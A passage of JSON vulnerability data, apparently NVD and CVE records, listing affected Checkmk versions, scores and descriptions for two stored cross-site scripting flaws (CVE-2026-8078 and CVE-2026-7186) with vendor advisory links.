"matchCriteriaId": "050B6617-8FD4-47A6-BE4A-A52503A65812"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p9:*:*:*:*:*:*", "matchCriteriaId": "4CA0FEC5-7036-47AF-A341-873B6C324B58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "83202950-840A-4CB7-AD96-CE62E84FABD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b1:*:*:*:*:*:*", "matchCriteriaId": "1A020A77-7D84-4557-9B0B-D74A89BC1538"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b2:*:*:*:*:*:*", "matchCriteriaId": "D9770554-978B-4552-9E0E-CD6B6675243C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b3:*:*:*:*:*:*", "matchCriteriaId": "1883D2F4-CB96-4DDE-87E8-D1990A3FA092"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b4:*:*:*:*:*:*", "matchCriteriaId": "99AD6F39-AF67-4CB9-BED2-00CA75B9F5DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b5:*:*:*:*:*:*", "matchCriteriaId": "F08FE580-67D4-419C-AE4A-3B9EBC6A2838"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b6:*:*:*:*:*:*", "matchCriteriaId": "9DD5C67F-CD3E-400E-802D-8B52408A259F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:*", "matchCriteriaId": "310A2FA2-633A-48FB-A5C2-9A9A922E72E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:*", "matchCriteriaId": "3C0F1DC8-D9DF-4A7A-80DC-618FAB091375"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:*", "matchCriteriaId": "9B0A1E3E-1B5A-4346-95BC-DE6FF6EE14CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p12:*:*:*:*:*:*", "matchCriteriaId": "EB52B2A7-BDC1-4A4F-ABAF-69C1BA8E83C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p13:*:*:*:*:*:*", "matchCriteriaId": "9F89225F-6969-4D89-B889-9CB09972825B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p14:*:*:*:*:*:*", "matchCriteriaId": "2A1B23EA-4571-4E4E-80BC-FD76FFD83FFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p15:*:*:*:*:*:*", "matchCriteriaId": "625A6998-5DAE-4538-9760-20523CCE501F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p16:*:*:*:*:*:*", "matchCriteriaId": "6EFD4461-2C37-418F-90AD-3A956B2D91C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p17:*:*:*:*:*:*", "matchCriteriaId": "88523633-844C-41FE-ADF1-74D6AA2BCE6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p18:*:*:*:*:*:*", "matchCriteriaId": "5DA03E01-06D1-4E18-9C7B-CB6E49E5954B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p19:*:*:*:*:*:*", "matchCriteriaId": "91F171B6-7F9A-4B9B-B53D-277FE74124F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7D1993E3-C4F9-4D78-BD02-A0B22D93BF1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p20:*:*:*:*:*:*", "matchCriteriaId": "34FF7D09-2129-4266-BF71-5424DC9E18B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p21:*:*:*:*:*:*", "matchCriteriaId": "246F0BA5-F927-4204-97F3-51870072599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p22:*:*:*:*:*:*", "matchCriteriaId": "86ED47B6-58FB-4BAC-9C87-F7BC08AB3870"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p23:*:*:*:*:*:*", "matchCriteriaId": "2CFF173A-373B-4948-BD22-86C031B58E6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p24:*:*:*:*:*:*", "matchCriteriaId": "90648825-55F7-472A-944E-7E5C787FAFB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p25:*:*:*:*:*:*", "matchCriteriaId": "6EE2BA6D-737A-4EEB-B8A2-91E9C61B70C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p26:*:*:*:*:*:*", "matchCriteriaId": "94FA8F05-267D-4B24-9AA3-A77FAD259310"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p27:*:*:*:*:*:*", "matchCriteriaId": "085B463B-633A-447A-B61C-99DD78B49A00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p28:*:*:*:*:*:*", "matchCriteriaId": "F5DB112B-EE65-4BAB-AED8-716E618FD89C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p29:*:*:*:*:*:*", "matchCriteriaId": "CD9EDBC8-A6A7-4348-8446-1D1DDDACDC51"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p3:*:*:*:*:*:*", "matchCriteriaId": "B28A0C9D-072A-413C-8587-CD57CB918190"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p30:*:*:*:*:*:*", "matchCriteriaId": "CB0E10D1-2497-4CAE-ABA5-9F861C6A65DF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p31:*:*:*:*:*:*", "matchCriteriaId": "9E64A46A-A1E2-4272-A7B8-36140AF2B889"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p32:*:*:*:*:*:*", "matchCriteriaId": "28568D2A-CA5B-42C2-8A32-FF783CB7A06F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p33:*:*:*:*:*:*", "matchCriteriaId": "F82F8827-B7B2-4C10-A42A-77781BC7B24B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p34:*:*:*:*:*:*", "matchCriteriaId": "F641BB83-8A0D-42D0-AB3E-7314918FDC9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p35:*:*:*:*:*:*", "matchCriteriaId": "FCCE61D4-00B1-4D83-8FAE-8F2FA8F48E2F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p36:*:*:*:*:*:*", "matchCriteriaId": "FDB9628A-5A72-4DD5-9D4A-CBE13B0CFDF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p37:*:*:*:*:*:*", "matchCriteriaId": "E34FEBB1-0935-4363-B4FE-45901BFC9A5D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p38:*:*:*:*:*:*", "matchCriteriaId": "5C43DE3C-0098-4613-B2A4-39607A63CE42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p39:*:*:*:*:*:*", "matchCriteriaId": "7F5F5665-C2A9-4877-B3F6-59059A1EEFF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p4:*:*:*:*:*:*", "matchCriteriaId": "DF22D0A7-82B1-4598-B8C5-BDFE523D07F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p40:*:*:*:*:*:*", "matchCriteriaId": "7352D105-D045-427C-BA79-0B16D41139D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p41:*:*:*:*:*:*", "matchCriteriaId": "589909F7-D6E5-4B33-9735-2B97E0B37B87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p42:*:*:*:*:*:*", "matchCriteriaId": "1BB8717F-F458-4E4C-8D8D-C4F68D4D4B05"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p43:*:*:*:*:*:*", "matchCriteriaId": "1F621FFA-A2C8-46AD-8690-A16CF8B3A048"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p44:*:*:*:*:*:*", "matchCriteriaId": "70807D99-2DAC-4363-BAB3-D047C79DBFBA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p45:*:*:*:*:*:*", "matchCriteriaId": "AD50FAD8-9878-4E77-B50D-5359ABFB94DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p46:*:*:*:*:*:*", "matchCriteriaId": "0B7FE8F8-E746-45E4-9A20-1873FDF231E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p47:*:*:*:*:*:*", "matchCriteriaId": "46F70C2A-4595-4BB7-9ADF-8C1FC1344825"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p5:*:*:*:*:*:*", "matchCriteriaId": "20035AFB-75B4-4164-9833-A2FCAE24B577"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p6:*:*:*:*:*:*", "matchCriteriaId": "8BCBACEB-7130-455D-B4BE-243053C116DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p7:*:*:*:*:*:*", "matchCriteriaId": "156384E2-E04B-4153-A91F-3F307C9FEAE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p8:*:*:*:*:*:*", "matchCriteriaId": "EEC0ED95-F43B-46D7-9AA0-A0FB1C32EF1D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p9:*:*:*:*:*:*", "matchCriteriaId": "91C194C1-5292-4E2A-BB71-9C5CD3CE6194"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "35B80091-48DA-4414-809F-EBE675B533DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "022C075A-4B04-4141-A7D7-F93C9A7CE0FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b1:*:*:*:*:*:*", "matchCriteriaId": "60C00469-0CD1-4E9C-8370-CE113842056C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b2:*:*:*:*:*:*", "matchCriteriaId": "179905FC-821F-4214-A872-E4E3702419D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b3:*:*:*:*:*:*", "matchCriteriaId": "04956994-D5A8-45EE-9DC2-8A1D3058CE8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b4:*:*:*:*:*:*", "matchCriteriaId": "8868449B-7259-4C3B-8344-0EFE0BA3A97E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b5:*:*:*:*:*:*", "matchCriteriaId": "BBDF3A13-582F-43D2-B42F-0DC42D4FBFBA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b6:*:*:*:*:*:*", "matchCriteriaId": "DAF500B3-AA6A-4618-BC7E-0F214B795E0F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p1:*:*:*:*:*:*", "matchCriteriaId": "1CFE68AB-1F57-497C-9229-29ED3A73D87F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p10:*:*:*:*:*:*", "matchCriteriaId": "577F9F72-2FDA-4F87-A840-05158F2368B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p11:*:*:*:*:*:*", "matchCriteriaId": "6F3AD894-660B-41FC-B910-899A764A00B6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p12:*:*:*:*:*:*", "matchCriteriaId": "21853BB4-1BB5-40E3-82E2-253899D898ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p13:*:*:*:*:*:*", "matchCriteriaId": "E7963D66-A89A-4167-A2BA-DFF89B439EAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p14:*:*:*:*:*:*", "matchCriteriaId": "42099281-2026-4507-A20B-C669C206ADB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p15:*:*:*:*:*:*", "matchCriteriaId": "29A44B1E-83CD-4A3D-AFFD-82AAC7760293"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p16:*:*:*:*:*:*", "matchCriteriaId": "B4B87192-D81E-4269-ABF3-8D700BB531B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p17:*:*:*:*:*:*", "matchCriteriaId": "3D35CD46-F8CF-49C3-8CD9-53E1ED038023"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p18:*:*:*:*:*:*", "matchCriteriaId": "D5B5649C-C0BA-4905-98DD-CA606DD2B886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p19:*:*:*:*:*:*", "matchCriteriaId": "29148EA6-675F-4B35-81BF-B8254C1EB675"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p2:*:*:*:*:*:*", "matchCriteriaId": "B11306B4-1092-470C-BA87-DBD02A18A74B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p20:*:*:*:*:*:*", "matchCriteriaId": "9E85F65E-A103-425E-8AD5-7EE9F093B463"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p21:*:*:*:*:*:*", "matchCriteriaId": "65DF329A-4E2D-4138-99C5-6765789051CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p22:*:*:*:*:*:*", "matchCriteriaId": "1B9B340D-84F6-4CE9-A627-E26F340B3705"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p23:*:*:*:*:*:*", "matchCriteriaId": "CCAD0F84-7273-4FDF-B238-177E1C4D5F5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p24:*:*:*:*:*:*", "matchCriteriaId": "860D2E5C-6277-44F5-A3FE-C085F76B8514"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p25:*:*:*:*:*:*", "matchCriteriaId": "FAEB7D48-C80F-4804-8E76-C950B9714533"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p26:*:*:*:*:*:*", "matchCriteriaId": "6CF72A28-8A7D-412D-8B20-2D50DE613F80"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p27:*:*:*:*:*:*", "matchCriteriaId": "0C680E16-A5D5-4847-86D5-A0D99472CD27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p28:*:*:*:*:*:*", "matchCriteriaId": "B78EC3D8-4FE2-4CAE-AAD0-BF0701945F6A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p29:*:*:*:*:*:*", "matchCriteriaId": "93D6757C-F17F-49D7-8C5E-2DB5F0DE5764"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p3:*:*:*:*:*:*", "matchCriteriaId": "74F78C48-030A-48A1-B69E-04C4EA5CCC12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p30:*:*:*:*:*:*", "matchCriteriaId": "DC31DE74-ED72-478F-9762-CACF26B31A6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p4:*:*:*:*:*:*", "matchCriteriaId": "8701A914-774B-4E3B-A651-4A9FD19A187A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p5:*:*:*:*:*:*", "matchCriteriaId": "19E40054-C44D-4C4C-B077-0333D8201E5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p6:*:*:*:*:*:*", "matchCriteriaId": "0E2D2F49-32B2-42AA-B99E-7C39403CF104"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p7:*:*:*:*:*:*", "matchCriteriaId": "ACE440F8-EBF5-4DBB-A215-57D770C66219"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p8:*:*:*:*:*:*", "matchCriteriaId": "1A94395D-DDCE-4977-89CA-46F71C3CA2B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p9:*:*:*:*:*:*", "matchCriteriaId": "9513876C-8DF0-4A59-864F-8401BAA43376"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "7797AFCE-3FF9-497C-AEA9-D6CF170F056D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b1:*:*:*:*:*:*", "matchCriteriaId": "F8943BB3-1487-494C-B4EB-89EB0B18B6A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b2:*:*:*:*:*:*", "matchCriteriaId": "5342045D-CB9F-4663-9538-8B657C9AC833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b3:*:*:*:*:*:*", "matchCriteriaId": "E9566834-D4EE-4104-AD60-7988FCF17224"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p1:*:*:*:*:*:*", "matchCriteriaId": "F53BB4AD-54A6-4A77-868A-D6972DDF0EAA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p2:*:*:*:*:*:*", "matchCriteriaId": "0405E40E-7969-49B3-90EC-98A982464275"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p3:*:*:*:*:*:*", "matchCriteriaId": "629E039F-1C52-48DF-A952-11220A890AC2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p4:*:*:*:*:*:*", "matchCriteriaId": "CDC5BD88-F1D9-4ED4-81AA-3E6CD9AF16A8"}]}]}], "references": [{"url": "https://checkmk.com/werk/17992", "source": "security@checkmk.com", "tags": ["Vendor Advisory"]}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "fkie_cve-2026-8078"}]}}}, {"dataType": "CVE_RECORD", "dataVersion": "5.2", "cveMetadata": {"cveId": "CVE-2026-8078", "assignerOrgId": "f7d6281c-4801-44ce-ace2-493291dedb0f", "state": "PUBLISHED", "assignerShortName": "Checkmk", "dateReserved": "2026-05-07T11:16:47.854Z", "datePublished": "2026-06-08T12:06:36.666Z", "dateUpdated": "2026-06-08T13:03:18.164Z"}, "containers": {"cna": {"affected": [{"defaultStatus": "unaffected", "product": "Checkmk", "vendor": "Checkmk GmbH", "versions": [{"lessThan": "2.5.0p5", "status": "affected", "version": "2.5.0", "versionType": "semver"}, {"lessThan": "2.4.0p31", "status": "affected", "version": "2.4.0", "versionType": "semver"}, {"lessThan": "2.3.0p48", "status": "affected", "version": "2.3.0", "versionType": "semver"}, {"status": "affected", "version": "2.2.0", "versionType": "semver"}]}], "descriptions": [{"lang": "en", "value": "Stored cross-site scripting in the global settings change log in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can change global settings to store malicious HTML or JavaScript in changelog messages that executes in other users' browsers when they view the Activate Changes page or Audit log."}], "impacts": [{"capecId": "CAPEC-592", "descriptions": [{"lang": "en", "value": "CAPEC-592: Stored XSS"}]}], "metrics": [{"cvssV4_0": {"baseScore": 4.8, "baseSeverity": "MEDIUM", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N", "version": "4.0"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-79", "description": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "f7d6281c-4801-44ce-ace2-493291dedb0f", "shortName": "Checkmk", "dateUpdated": "2026-06-08T12:06:36.666Z"}, "references": [{"url": "https://checkmk.com/werk/17992", "tags": ["vendor-advisory"]}], "title": "Fix stored XSS in global settings change log", "cpeApplicability": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.5.0", "versionEndExcluding": "2.5.0p5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.4.0p31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.0p48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:*:*:*:*:*:*:*"}]}]}], "x_generator": {"engine": "cvelib 1.8.0"}, "x_gcve": [{"recordType": "advisory", "vulnId": "cve-2026-8078"}]}, "adp": [{"metrics": [{"other": {"type": "ssvc", "content": {"timestamp": "2026-06-08T13:03:13.239564Z", "id": "CVE-2026-8078", "options": [{"Exploitation": "none"}, {"Automatable": "no"}, {"Technical Impact": "partial"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2026-06-08T13:03:18.164Z"}}]}}, {"id": "CVE-2026-7186", "sourceIdentifier": "security@checkmk.com", "published": "2026-06-08T13:16:33.480", "lastModified": "2026-06-08T15:53:35.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored cross-site scripting in the URL dashboard widget in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows a user with dashboard editing permissions to store a URL with a dangerous URI scheme such as javascript: that executes scripts in other users' browsers when they view the dashboard."}], "metrics": {"cvssMetricV40": [{"source": "security@checkmk.com", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "security@checkmk.com", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "C66704F1-0B5E-4B43-8748-987022F378F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:*", "matchCriteriaId": "B068974F-6F67-4CBB-B567-FCED86E28F22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:*", "matchCriteriaId": "EA70F36A-EEF6-48DC-B15E-055D0DE8A052"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:*", "matchCriteriaId": "B2017F38-38DB-4E96-B34F-160BC731CBBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:*", "matchCriteriaId": "0949F399-371B-409C-AF9F-32690D881440"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b5:*:*:*:*:*:*", "matchCriteriaId": "42E1E31A-B5CC-45F2-A2E5-3EEF735499BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b6:*:*:*:*:*:*", "matchCriteriaId": "4B364FCA-500C-458E-B997-82CD0B1D24F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b7:*:*:*:*:*:*", "matchCriteriaId": "0B32E657-917B-482B-B6A4-3D3746992A4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b8:*:*:*:*:*:*", "matchCriteriaId": "2119C732-E024-4DA6-8E47-9E08E5E12602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:i1:*:*:*:*:*:*", "matchCriteriaId": "4F0B99A8-A124-43BD-B8AA-EECC9112346F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "matchCriteriaId": "3FB7221E-BE9F-4529-8E07-8AD547FA3208"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "matchCriteriaId": "30A074AD-9499-46E3-AB67-D6CEE3AA01C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "matchCriteriaId": "A8BD0240-A22B-4273-BD47-C35A8C12E127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "matchCriteriaId": "DAA5680F-1DD0-48AA-BB7F-15B27365F0FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "matchCriteriaId": "BC2F31CA-D4EB-44E6-9A09-5255D33F4A88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p14:*:*:*:*:*:*", "matchCriteriaId": "CD80BD69-20C6-4E17-B165-98689179A5A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p15:*:*:*:*:*:*", "matchCriteriaId": "B044D43B-0233-4A0D-A356-B9F9324E2777"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p16:*:*:*:*:*:*", "matchCriteriaId": "7DE79896-EBE5-42F2-A126-2A871BBA1071"}, {"vulnerable": true, "criteria": 